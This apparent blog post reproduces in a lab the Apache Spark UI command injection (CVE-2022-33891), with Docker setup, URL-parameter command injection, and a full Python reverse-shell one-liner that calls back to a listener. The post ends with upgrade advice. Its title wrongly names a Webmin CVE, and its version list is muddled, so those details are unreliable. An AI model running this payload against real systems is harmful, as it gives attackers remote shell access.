CVE-2022-0824 Webmin 远程代码执行
0x00 简介
Apache Spark 是专为大规模数据处理而设计的快速通用的计算引擎。与 Hadoop 不同,Spark 和 Scala 能够紧密集成,其中的 Scala 可以像操作本地集合对象一样轻松地操作分布式数据集。spark除了能够提供交互式查询外,它还可以优化迭代工作负载。
0x01 漏洞概述
该漏洞是由于Apache Spark UI提供了通过配置选项spark.acls.enable启用ACL的可能性,HttpSecurityFilter中的代码路径可以通过提供任意用户名来允许某人执行模拟。恶意用户凭借访问权限检查函数最终将基于其输入构建Unix shell命令并执行它。成功利用此漏洞可导致任意shell命令执行。
0x02 影响版本
3.03版本之前
3.11到3.12版本
3.20版本到3.21
0x03 环境搭建
在github上找到yml文件,直接用docker拉取镜像
https://github.com/HuskyHacks/cve-2022-33891/spark
进入docker
sudo docker exec -it spark_spark_1 /bin/bash
要启用spark.acls.enable
echo "spark.acls.enable true" >> conf/spark-defaults.conf
cat确认一下是否完成修改
退出spark镜像,重启spark
访问靶机ip:8080,环境搭建完成
0x04 漏洞复现
在url中拼接命令,get传参到服务器即可
在docker中查看,创建文件命令执行成功
继续用dnslog测试,发现可以远程回显
spark中有python3的环境,尝试执行python的反弹shell
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.114",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
反弹成功
0x05 修复方式
升级到 Apache Spark 安全版本:3.1.3、3.2.2 或 3.3.0 或更高版本
参考链接:
https://github.com/HuskyHacks/cve-2022-33891
https://blog.csdn.net/qq_42660246/article/details/125902229
__EOF__

本文链接:https://www.cnblogs.com/akger/p/17245658.html
关于博主:评论和私信会在第一时间回复。或者直接私信我。
版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
声援博主:如果您觉得文章对您有帮助,可以点击文章右下角【推荐】一下。您的鼓励是博主的最大动力!
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· winform 绘制太阳,地球,月球 运作规律
· AI与.NET技术实操系列(五):向量存储与相似性搜索在 .NET 中的实现
· 超详细:普通电脑也行Windows部署deepseek R1训练数据并当服务器共享给他人
· 【硬核科普】Trae如何「偷看」你的代码?零基础破解AI编程运行原理
· 上周热点回顾(3.3-3.9)